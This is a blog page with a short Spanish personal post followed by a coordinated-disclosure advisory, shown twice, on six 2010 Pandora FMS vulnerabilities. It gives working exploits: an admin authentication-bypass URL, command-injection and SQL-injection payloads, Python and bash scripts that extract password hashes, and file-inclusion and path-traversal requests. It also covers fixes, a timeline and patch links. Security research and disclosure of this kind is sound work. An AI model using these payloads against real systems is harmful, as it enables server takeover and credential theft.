Hola,
Quería compartir con vosotros un par de enlaces, el primero de ellos es un artículo que escribí hace un par de meses aproximadamente en 48Bits sobre un análisis desde el punto de vista de seguridad de cómo trabaja Microsoft IIS 6 y ASP junto con ciertos componentes de terceros que realizan operaciones sobre carpetas y ficheros, y cómo aprovecharlo para conseguir control total sobre el servidor.
http://blog.48bits.com/2010/09/28/iis6-asp-file-upload-for-fun-and-profit/
Por otro lado, la semana pasada publiqué un advisory de seguridad para Pandora FMS, un software de monitorización, que incluye 6 CVE IDs: CVE-2010-4278, CVE-2010-4279, CVE-2010-4280, CVE-2010-4281, CVE-2010-4282, CVE-2010-4283.
Entre las vulnerabilidades descubiertas se encuentra un bug que permite saltarse la autenticación a la aplicación pudiendo acceder como cualquier usuario -incluido admin- sin conocer las credenciales de acceso, así como varias vulnerabilidades de validación de entrada, tales como OS Command Injection, SQL Injection, Blind SQL Injection, inclusión de ficheros remota, ejecución de código PHP arbitrario y multiples inclusiones de ficheros locales, que permitirían a un atacante remoto obtener el control total sobre el servidor objetivo. Estas vulnerabilidades fueron notificadas y corregidas, por lo que en el advisory se dan detalles de cómo obtener la nueva versión no afectada por estos bugs.
He posteado los detalles en el blog pero podeis acceder del mismo modo a través de estos enlaces:
http://www.securityfocus.com/bid/45112
http://secunia.com/advisories/42347
http://seclists.org/fulldisclosure/2010/Nov/326
Haciendo un repaso a las conferencias que se han ido celebrando en 2010, este año ha estado muy interesante y he asistido a varias, entre ellas: RootedCON (Madrid), PH-Neutral (Berlín), OWASP AppSec Ireland (Dublin), LaCon (León), hashdays (Lucerne) e IRISSCON (Dublin). Destacar el nivel impresionante que hubo en las charlas de este año de LaCon. Outstanding!
También ha habido tiempo para disfrutar y viajar un poco, por lo que he ido haciendo algunas escapadas, entre ellas a: Paris, Londres, Bruselas, Amsterdam, Milán, Bérgamo, Venecia, Ginebra, Zurich.... y como no... unas merecidas vacaciones en España! :D . Así que espero que el año que viene sea igual o más productivo y poder cumplir mis objetivos para 2011.
Sunday, 12 December 2010
Pandora FMS Authentication Bypass and Multiple Input Validation Vulnerabilities
These are the details about a security advisory I released last week:
CVE IDs in this security advisory:
1) Authentication bypass - CVE-2010-4279
2) OS Command Injection - CVE-2010-4278
3) SQL Injection - CVE-2010-4280
4) Blind SQL Injection - CVE-2010-4280
5) Path Traversal - CVE-2010-4281 - CVE-2010-4282 - CVE-2010-4283
[+] Introduction
Pandora FMS (for Pandora Flexible Monitoring System) is a software solution for monitoring computer networks. It allows monitoring in a visual way the status and performance of several parameters from different operating systems, servers, applications and hardware systems such as firewalls, proxies, databases, web servers or routers.
It can be deployed in almost any operating system. It features remote monitoring (WMI, SNMP, TCP. UDP, ICMP, HTTP...) and it can also use agents. An agent is available for each platform. It can also monitor hardware systems with a TCP/IP stack, such as load balancers, routers, network switches, printers or firewalls.
This software has several servers that process and get information from different sources, using WMI for gathering remote Windows information, a predictive server, a plug-in server which makes complex user-defined network tests, an advanced export server to replicate data between different sites of Pandora FMS, a network discovery server, and an SNMP Trap console.
Released under the terms of the GNU General Public License, Pandora FMS is free software.
[+] Description and Proof of Concept
1) Authentication bypass - CVE-2010-4279 - CVSS: 10/10
An attacker could access to any account user, including admin, using the "hash login" authentication process. This kind of authentication method works providing a username and a hash. The issue could be exploited remotely providing a username and the md5 of it when $config['loginhash_pwd'] is empty, that in fact is the default configuration.
Snippet of vulnerable code in index.php:
136 // Hash login process
137 if (! isset ($config['id_user']) && isset ($_GET["loginhash"])) {
138 $loginhash_data = get_parameter("loginhash_data", "");
139 $loginhash_user = get_parameter("loginhash_user", "");
140
141 if ($loginhash_data == md5($loginhash_user.$config["loginhash_pwd"])) {
142 logon_db ($loginhash_user, $_SERVER['REMOTE_ADDR']);
143 $_SESSION['id_usuario'] = $loginhash_user;
144 $config["id_user"] = $loginhash_user;
Proof of concept:
http://servername/pandora_console/index.php?loginhash_data=21232f297a57a5a743894a0e4a801fc3&loginhash_user=admin&loginhash=1
Got it! admin! :)
By default, any installation of this software allows unauthenticated attackers to perform an authentication bypass and a privilege escalation to admin.
1.1) Additionally, a manual modification in order to use the hash_hmac function instead of the weak statement md5 ( $string . $KEY) is encouraged for security purposes.
Snippet of code (index.php, version 3.1.1):
145 // Hash login process
(...)
150 if ($config["loginhash_pwd"] != "" && $loginhash_data == md5($loginhash_user.$config["loginhash_pwd"])) {
In line 150, use hash_hmac("sha256",$loginhash_user,$config["loginhash_pwd"]), instead of md5($lioginhash_user.$config["loginhash_pwd"])
2) OS Command Injection - CVE-2010-4278 - CVSS 9/10
The layout parameter in file operation/agentes/networkmap.php is not properly filtered and allows an attacker to inject OS commands.
Snippet of vulnerable code (file operation/agentes/networkmap.php):
32 $layout = (string) get_parameter ('layout', 'radial');
...
137 $filename_map = $config["attachment_store"]."/networkmap_".$layout;
138 $filename_img = "attachment/networkmap_".$layout."_".$font_size;
139 $filename_dot = $config["attachment_store"]."/networkmap_".$layout;
...
162 $cmd = "$filter -Tcmapx -o".$filename_map." -Tpng -o".$filename_img." ".$filename_dot;
163 $result = system ($cmd);
PoC:
http://servername/pandora_console/index.php?login=1&login=1&sec=estado&sec2=operation/agentes/networkmap&refr=0&layout=1;uname%20-a;
http://servername/pandora_console/index.php?login=1&sec=estado&sec2=operation/agentes/networkmap&refr=0&layout=1;id;
If we use vulnerability #1 (that permits bypass the authentication system and login as admin) with this issue, the CVSS will be 10/10.
3) SQL Injection - CVE-2010-4280 - CVSS 8.5/10
The parameter id_group when get_agents_group_json is equal to 1 is vulnerable to SQL Injection attacks.
PoC: http://host/pandora_console/ajax.php?page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1/**/and/**/1=0/**/union/**/select/**/id_user,password/**/from/**/tusuario
Exploit:
# Pandora Flexible Monitoring System SQL Injection PoC
# Juan Galiana Lara
# Gets the list of users and password from the database
#
#configure cookie&host before use it
#usage
#python sqlinj_users.py
#admin:75b756ff2785ea8bb9ae02c13b6a71f1
#...
import json
import urllib2
headers = {"Cookie": "PHPSESSID=a4s3nf1tqv2fau8s6qhi6rutp9dahe9o"}
url = "http://HOST/pandora_console/ajax.php"
url+= "?page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1"
url+= "/**/and/**/1=0/**/union/**/select/**/id_user,password/**/from/**/tusuario"
req = urllib2.Request(url,headers=headers)
resp = urllib2.urlopen(req)
users = json.read(resp.read())
for user in users:
print(user["id_agente"]+":"+user["nombre"])
The fix to these kind of issues was the implementation of a generic filter against sql injection. A proper fix is planned for a major version.
4) Blind SQL Injection - CVE-2010-4280 - CVSS: 8.5/10
The parameter group_id of operation/agentes/estado_agente.php is vulnerable to blind sql injection.
PoC: http://host/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=24%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,1,1%29%29=49%20and%20id_user=0x61646d696e%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281
Exploit:
#!/bin/bash
# Pandora Flexible Monitoring System Blind SQL Injection PoC
# Juan Galiana Lara
# Gets the md5 hash password from a specific user
#
#configure host,cookie&group_id before use it
#usage
#$ ./getpassword.sh
#74b444ff2785ea8bb9ae02c13b6a71f1
HOST="HOST"
TARGET_USER="0x61646d696e" #admin
PATTERN="Interval"
COOKIE="rq842tci6e5ib7t918c6sv1ml4"
CHARSET=(0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o p q r s t u v w x y z)
GROUP_ID=2
j=1
while [[ $j -lt 33 ]]; do
i=0
while [[ $i -lt ${#CHARSET[@]} ]]; do
c=$(printf '%d' "'${CHARSET[$i]}")
URL="http://$HOST/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=$GROUP_ID%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,$j,1%29%29=$c%20and%20id_user=$TARGET_USER%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281";
curl $URL --cookie "PHPSESSID=$COOKIE" 2> /dev/null | grep -q $PATTERN;
if [ $? -eq 0 ]; then echo -n ${CHARSET[$i]}; break; fi;
let i++
done;
if [[ $i -eq ${#CHARSET[@]} ]]; then echo "Something went wrong!"; exit 1; fi
let j++;
done
echo
exit 0
The fix to these kind of issues was the implementation of a generic filter against sql injection. A proper fix is planned for a major version.
5) Path Traversal:
5.1 - PHP File Inclusion (or RFI/LFI: Remote/Local file inclusion) - CVE-2010-4281 -CVE-2010-4282 - CVSS 8.5/10
Parameter 'page' of ajax.php is not properly sanitizing user-supplied input. The function safe_url_extraclean is filtering ':' character, and it doesn't allow to use the string "http://" to create urls, but allows '/' character and an attacker could reference remote resources via Windows UNC files, using //servername//resource/file
Note that the first check in safe_url_extraclean is filtering '://', so we can bypass the filter easily doing http://http://url, and it only strip the first protocol://. However, the last preg_replace strips the : character.
Proof of concept:
UNC: http://servername/pandora_console/ajax.php?page=//server/share/test
As well, ajax.php allows to include any php file in the disk
filesystem: http://servername/pandora_console/ajax.php?page=../../../../../directory/file
Character is not allowed due safe_url_extraclean function filtering, and is not possible to include other files distinct that php files, but still allows . and / characters.
5.2 - PHP File Inclusion (or RFI Remote file inclusion) - CVE-2010-4283 - CVSS 7.9/10
An attacker can inject arbitrary PHP code and execute it remotely due argv[1] parameter is not filtered in file pandora_diag.php.
PoC:
http://servername/pandora_console/extras/pandora_diag.php?argc=2&argv[1]=http://serverattacker/salsa.php
Note: that issue needs register_globals set to On to be exploitable.
5.3 - Path traversal & Local file inclusion vulnerabilities - CVE-2010-4282 - CVSS 6.8/10
An attacker can include arbitrary files of the filesystem via id parameter in file pandora_help.php.
Snippet of vulnerable code:
24 $id = get_parameter ('id');
25
26 /* Possible file locations */
27 $files = array ($config["homedir"]."/include/help/".$config["language"]."/help_".$id.".php",
28 $config["homedir"].ENTERPRISE_DIR."/include/help/".$config["language"]."/help_".$id.".php",
29 $config["homedir"].ENTERPRISE_DIR."/include/help/en/help_".$id.".php",
30 $config["homedir"]."/include/help/en/help_".$id.".php");
31 $help_file = '';
32 foreach ($files as $file) {
33 if (file_exists ($file)) {
34 $help_file = $file;
35 break;
36 }
37 }
...
62 require_once ($help_file);
Proof of concept:
http://servername/pandora_console/general/pandora_help.php?id=/../../../../../../../boot.ini
This code is platform dependent bug, you can read more at http://seclists.org/fulldisclosure/2010/Jul/137
Only works in windows systems, an attacker can include local file using ../ characters due parameter id is not filtered
If magic_quotes_gpc is Off, arbitrary files can be included, like boot.ini using NULL character (), if not, only php files are allowed
5.4 - Path traversal & Arbitrary write and delete files - CVE-2010-4282 - CVSS 8.0/10
In file operation/agentes/networkmap.php the 'layout' parameter is handled in an insecure way and it is used to write and delete files on the filesystem.
An attacker could use this parameter to write in arbitrary paths and even remove files.
Snippet of vulnerable code:
32 $layout = (string) get_parameter ('layout', 'radial');
...
137 $filename_map = $config["attachment_store"]."/networkmap_".$layout;
138 $filename_img = "attachment/networkmap_".$layout."_".$font_size;
139 $filename_dot = $config["attachment_store"]."/networkmap_".$layout;
...
157 $fh = @fopen ($filename_dot, 'w');
158 if ($fh === false) {
159 $result = false;
160 } else {
161 fwrite ($fh, $graph);
162 $cmd = "$filter -Tcmapx -o".$filename_map." -Tpng -o".$filename_img." ".$filename_dot;
163 $result = system ($cmd);
164 fclose ($fh);
165 unlink ($filename_dot);
166 }
...
178 require ($filename_map);
Character sequences '../' could be used to write files (due -o parameter in lines 162 and 163), as well as potentially remove files (line 157, 161 and 165) or include them (line 178)
As well like in 5.3 this issue is only exploitable in windows environments because the same reason.
[+] Impact
An attacker can execute commands of the operating system, inject remote code in the context of the application, get arbitrary files from the filesystem or extract any data of the database including passwords and confidential information about the monitored network/systems. Also it is possible to bypass the authentication or scale privileges to became admin, gaining full control of the web application and web server. These vulnerabilities have a high impact to the confidentiality, integrity, and availability of the system.
[+] Systems affected
Versions prior and including 3.1 of Pandora FMS are affected
[+] Solution
Apply the security fix for version 3.1: http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download
Or upgrade to version 3.1.1 from http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/
[+] Timeline
Ago 2010: First contact to vendor
Ago 2010: Confirmation of vendor
Sept 2010: Second contact: SQL Injection vulnerabilities
Sept 2010: Confirmation that the fix will be released on October
Oct 2010: PandoraFMS security patch for 3.1 version released
Oct 2010: Request for CVE numbers
Nov 2010: PandoraFMS version 3.1.1 released
Nov 2010: Disclosure of this advisory
[+] References
Official PandoraFMS site: http://pandorafms.org/
SourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/
Wikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS
Common Vulnerability Scoring System (CVSS) v2 calculator: http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2
Common Vulnerabilities and Exposures (CVE): http://cve.mitre.org/
[+] Credits
These vulnerabilities has been discovered by Juan Galiana Lara - @jgaliana - http://juangaliana.blogspot.com/
Links:
http://www.securityfocus.com/bid/45112
http://secunia.com/advisories/42347
http://seclists.org/fulldisclosure/2010/Nov/326
CVE IDs in this security advisory:
1) Authentication bypass - CVE-2010-4279
2) OS Command Injection - CVE-2010-4278
3) SQL Injection - CVE-2010-4280
4) Blind SQL Injection - CVE-2010-4280
5) Path Traversal - CVE-2010-4281 - CVE-2010-4282 - CVE-2010-4283
[+] Introduction
Pandora FMS (for Pandora Flexible Monitoring System) is a software solution for monitoring computer networks. It allows monitoring in a visual way the status and performance of several parameters from different operating systems, servers, applications and hardware systems such as firewalls, proxies, databases, web servers or routers.
It can be deployed in almost any operating system. It features remote monitoring (WMI, SNMP, TCP. UDP, ICMP, HTTP...) and it can also use agents. An agent is available for each platform. It can also monitor hardware systems with a TCP/IP stack, such as load balancers, routers, network switches, printers or firewalls.
This software has several servers that process and get information from different sources, using WMI for gathering remote Windows information, a predictive server, a plug-in server which makes complex user-defined network tests, an advanced export server to replicate data between different sites of Pandora FMS, a network discovery server, and an SNMP Trap console.
Released under the terms of the GNU General Public License, Pandora FMS is free software.
[+] Description and Proof of Concept
1) Authentication bypass - CVE-2010-4279 - CVSS: 10/10
An attacker could access to any account user, including admin, using the "hash login" authentication process. This kind of authentication method works providing a username and a hash. The issue could be exploited remotely providing a username and the md5 of it when $config['loginhash_pwd'] is empty, that in fact is the default configuration.
Snippet of vulnerable code in index.php:
136 // Hash login process
137 if (! isset ($config['id_user']) && isset ($_GET["loginhash"])) {
138 $loginhash_data = get_parameter("loginhash_data", "");
139 $loginhash_user = get_parameter("loginhash_user", "");
140
141 if ($loginhash_data == md5($loginhash_user.$config["loginhash_pwd"])) {
142 logon_db ($loginhash_user, $_SERVER['REMOTE_ADDR']);
143 $_SESSION['id_usuario'] = $loginhash_user;
144 $config["id_user"] = $loginhash_user;
Proof of concept:
http://servername/pandora_console/index.php?loginhash_data=21232f297a57a5a743894a0e4a801fc3&loginhash_user=admin&loginhash=1
Got it! admin! :)
By default, any installation of this software allows unauthenticated attackers to perform an authentication bypass and a privilege escalation to admin.
1.1) Additionally, a manual modification in order to use the hash_hmac function instead of the weak statement md5 ( $string . $KEY) is encouraged for security purposes.
Snippet of code (index.php, version 3.1.1):
145 // Hash login process
(...)
150 if ($config["loginhash_pwd"] != "" && $loginhash_data == md5($loginhash_user.$config["loginhash_pwd"])) {
In line 150, use hash_hmac("sha256",$loginhash_user,$config["loginhash_pwd"]), instead of md5($lioginhash_user.$config["loginhash_pwd"])
2) OS Command Injection - CVE-2010-4278 - CVSS 9/10
The layout parameter in file operation/agentes/networkmap.php is not properly filtered and allows an attacker to inject OS commands.
Snippet of vulnerable code (file operation/agentes/networkmap.php):
32 $layout = (string) get_parameter ('layout', 'radial');
...
137 $filename_map = $config["attachment_store"]."/networkmap_".$layout;
138 $filename_img = "attachment/networkmap_".$layout."_".$font_size;
139 $filename_dot = $config["attachment_store"]."/networkmap_".$layout;
...
162 $cmd = "$filter -Tcmapx -o".$filename_map." -Tpng -o".$filename_img." ".$filename_dot;
163 $result = system ($cmd);
PoC:
http://servername/pandora_console/index.php?login=1&login=1&sec=estado&sec2=operation/agentes/networkmap&refr=0&layout=1;uname%20-a;
http://servername/pandora_console/index.php?login=1&sec=estado&sec2=operation/agentes/networkmap&refr=0&layout=1;id;
If we use vulnerability #1 (that permits bypass the authentication system and login as admin) with this issue, the CVSS will be 10/10.
3) SQL Injection - CVE-2010-4280 - CVSS 8.5/10
The parameter id_group when get_agents_group_json is equal to 1 is vulnerable to SQL Injection attacks.
PoC: http://host/pandora_console/ajax.php?page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1/**/and/**/1=0/**/union/**/select/**/id_user,password/**/from/**/tusuario
Exploit:
# Pandora Flexible Monitoring System SQL Injection PoC
# Juan Galiana Lara
# Gets the list of users and password from the database
#
#configure cookie&host before use it
#usage
#python sqlinj_users.py
#admin:75b756ff2785ea8bb9ae02c13b6a71f1
#...
import json
import urllib2
headers = {"Cookie": "PHPSESSID=a4s3nf1tqv2fau8s6qhi6rutp9dahe9o"}
url = "http://HOST/pandora_console/ajax.php"
url+= "?page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1"
url+= "/**/and/**/1=0/**/union/**/select/**/id_user,password/**/from/**/tusuario"
req = urllib2.Request(url,headers=headers)
resp = urllib2.urlopen(req)
users = json.read(resp.read())
for user in users:
print(user["id_agente"]+":"+user["nombre"])
The fix to these kind of issues was the implementation of a generic filter against sql injection. A proper fix is planned for a major version.
4) Blind SQL Injection - CVE-2010-4280 - CVSS: 8.5/10
The parameter group_id of operation/agentes/estado_agente.php is vulnerable to blind sql injection.
PoC: http://host/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=24%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,1,1%29%29=49%20and%20id_user=0x61646d696e%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281
Exploit:
#!/bin/bash
# Pandora Flexible Monitoring System Blind SQL Injection PoC
# Juan Galiana Lara
# Gets the md5 hash password from a specific user
#
#configure host,cookie&group_id before use it
#usage
#$ ./getpassword.sh
#74b444ff2785ea8bb9ae02c13b6a71f1
HOST="HOST"
TARGET_USER="0x61646d696e" #admin
PATTERN="Interval"
COOKIE="rq842tci6e5ib7t918c6sv1ml4"
CHARSET=(0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o p q r s t u v w x y z)
GROUP_ID=2
j=1
while [[ $j -lt 33 ]]; do
i=0
while [[ $i -lt ${#CHARSET[@]} ]]; do
c=$(printf '%d' "'${CHARSET[$i]}")
URL="http://$HOST/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=$GROUP_ID%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,$j,1%29%29=$c%20and%20id_user=$TARGET_USER%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281";
curl $URL --cookie "PHPSESSID=$COOKIE" 2> /dev/null | grep -q $PATTERN;
if [ $? -eq 0 ]; then echo -n ${CHARSET[$i]}; break; fi;
let i++
done;
if [[ $i -eq ${#CHARSET[@]} ]]; then echo "Something went wrong!"; exit 1; fi
let j++;
done
echo
exit 0
The fix to these kind of issues was the implementation of a generic filter against sql injection. A proper fix is planned for a major version.
5) Path Traversal:
5.1 - PHP File Inclusion (or RFI/LFI: Remote/Local file inclusion) - CVE-2010-4281 -CVE-2010-4282 - CVSS 8.5/10
Parameter 'page' of ajax.php is not properly sanitizing user-supplied input. The function safe_url_extraclean is filtering ':' character, and it doesn't allow to use the string "http://" to create urls, but allows '/' character and an attacker could reference remote resources via Windows UNC files, using //servername//resource/file
Note that the first check in safe_url_extraclean is filtering '://', so we can bypass the filter easily doing http://http://url, and it only strip the first protocol://. However, the last preg_replace strips the : character.
Proof of concept:
UNC: http://servername/pandora_console/ajax.php?page=//server/share/test
As well, ajax.php allows to include any php file in the disk
filesystem: http://servername/pandora_console/ajax.php?page=../../../../../directory/file
Character is not allowed due safe_url_extraclean function filtering, and is not possible to include other files distinct that php files, but still allows . and / characters.
5.2 - PHP File Inclusion (or RFI Remote file inclusion) - CVE-2010-4283 - CVSS 7.9/10
An attacker can inject arbitrary PHP code and execute it remotely due argv[1] parameter is not filtered in file pandora_diag.php.
PoC:
http://servername/pandora_console/extras/pandora_diag.php?argc=2&argv[1]=http://serverattacker/salsa.php
Note: that issue needs register_globals set to On to be exploitable.
5.3 - Path traversal & Local file inclusion vulnerabilities - CVE-2010-4282 - CVSS 6.8/10
An attacker can include arbitrary files of the filesystem via id parameter in file pandora_help.php.
Snippet of vulnerable code:
24 $id = get_parameter ('id');
25
26 /* Possible file locations */
27 $files = array ($config["homedir"]."/include/help/".$config["language"]."/help_".$id.".php",
28 $config["homedir"].ENTERPRISE_DIR."/include/help/".$config["language"]."/help_".$id.".php",
29 $config["homedir"].ENTERPRISE_DIR."/include/help/en/help_".$id.".php",
30 $config["homedir"]."/include/help/en/help_".$id.".php");
31 $help_file = '';
32 foreach ($files as $file) {
33 if (file_exists ($file)) {
34 $help_file = $file;
35 break;
36 }
37 }
...
62 require_once ($help_file);
Proof of concept:
http://servername/pandora_console/general/pandora_help.php?id=/../../../../../../../boot.ini
This code is platform dependent bug, you can read more at http://seclists.org/fulldisclosure/2010/Jul/137
Only works in windows systems, an attacker can include local file using ../ characters due parameter id is not filtered
If magic_quotes_gpc is Off, arbitrary files can be included, like boot.ini using NULL character (), if not, only php files are allowed
5.4 - Path traversal & Arbitrary write and delete files - CVE-2010-4282 - CVSS 8.0/10
In file operation/agentes/networkmap.php the 'layout' parameter is handled in an insecure way and it is used to write and delete files on the filesystem.
An attacker could use this parameter to write in arbitrary paths and even remove files.
Snippet of vulnerable code:
32 $layout = (string) get_parameter ('layout', 'radial');
...
137 $filename_map = $config["attachment_store"]."/networkmap_".$layout;
138 $filename_img = "attachment/networkmap_".$layout."_".$font_size;
139 $filename_dot = $config["attachment_store"]."/networkmap_".$layout;
...
157 $fh = @fopen ($filename_dot, 'w');
158 if ($fh === false) {
159 $result = false;
160 } else {
161 fwrite ($fh, $graph);
162 $cmd = "$filter -Tcmapx -o".$filename_map." -Tpng -o".$filename_img." ".$filename_dot;
163 $result = system ($cmd);
164 fclose ($fh);
165 unlink ($filename_dot);
166 }
...
178 require ($filename_map);
Character sequences '../' could be used to write files (due -o parameter in lines 162 and 163), as well as potentially remove files (line 157, 161 and 165) or include them (line 178)
As well like in 5.3 this issue is only exploitable in windows environments because the same reason.
[+] Impact
An attacker can execute commands of the operating system, inject remote code in the context of the application, get arbitrary files from the filesystem or extract any data of the database including passwords and confidential information about the monitored network/systems. Also it is possible to bypass the authentication or scale privileges to became admin, gaining full control of the web application and web server. These vulnerabilities have a high impact to the confidentiality, integrity, and availability of the system.
[+] Systems affected
Versions prior and including 3.1 of Pandora FMS are affected
[+] Solution
Apply the security fix for version 3.1: http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download
Or upgrade to version 3.1.1 from http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/
[+] Timeline
Ago 2010: First contact to vendor
Ago 2010: Confirmation of vendor
Sept 2010: Second contact: SQL Injection vulnerabilities
Sept 2010: Confirmation that the fix will be released on October
Oct 2010: PandoraFMS security patch for 3.1 version released
Oct 2010: Request for CVE numbers
Nov 2010: PandoraFMS version 3.1.1 released
Nov 2010: Disclosure of this advisory
[+] References
Official PandoraFMS site: http://pandorafms.org/
SourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/
Wikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS
Common Vulnerability Scoring System (CVSS) v2 calculator: http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2
Common Vulnerabilities and Exposures (CVE): http://cve.mitre.org/
[+] Credits
These vulnerabilities has been discovered by Juan Galiana Lara - @jgaliana - http://juangaliana.blogspot.com/
Links:
http://www.securityfocus.com/bid/45112
http://secunia.com/advisories/42347
http://seclists.org/fulldisclosure/2010/Nov/326
Subscribe to:
Posts (Atom)